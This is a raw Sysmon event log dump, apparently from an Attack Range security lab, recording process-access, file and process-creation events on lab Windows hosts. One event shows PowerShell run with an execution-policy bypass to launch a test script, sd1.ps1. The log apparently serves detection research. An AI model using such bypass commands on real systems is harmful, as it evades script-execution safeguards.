08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}4796ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf72aad6.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.799{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.761{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.761{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.730{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.730{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.730{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.730{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.730{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001052632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.699{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001052631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.699{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=A1920FFB99EBC00DBFD0FB3C2892097D,SHA256=6E4CC3AB44A361E4A311CB8C7203335C17F1816E641E41C33CD161799A2B3BE8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.661{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnk2021-07-12 07:47:36.117 23542300x80000000000000001052629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.661{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnkMD5=4960A9F5E5F5517F9E19E4747AD6B06D,SHA256=40786E25937F093830F8F2C4FE46BF3C38EB995DA4997942A0F09487BBB73A20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.615{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.615{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.615{466BC892-F715-60EB-B87D-00000000CF01}93808372C:\Windows\system32\conhost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001052618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.588{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\sd1.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.215{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96BA7682DC4FBF0BF48B6CE617B3117D,SHA256=F987450E936D0FFA582DC5A87BEA3C79F621FC1E1A58C0096C301826A215F0CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:29.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FF457B774AED09315144F7412D44AB2,SHA256=E0C1BC4F8F74351C6BC3DCBF290334BAAFB014ED71EE1217090025166C88A553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:29.114{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8A1849A1A36E22286B62037D5E7B16,SHA256=36E81259A5E6461CDE400F381C08F7EE3AC281131276B9C51FF81A0962C74C2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:30.177{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=F8EFB9B8438F16DE5BCCE48D8EAE4E69,SHA256=CD2D0131FE65D49A5A5EC6C4F250ED8DFBEDCBC359C4BB61064EC9CAA0D8D550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:30.130{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0DB05DF0D1B4FBDE37630899880519D,SHA256=F517664F85E3BFD9E4B1CFC26187A432A869738AE777F04073ABB590330E71D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.904{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 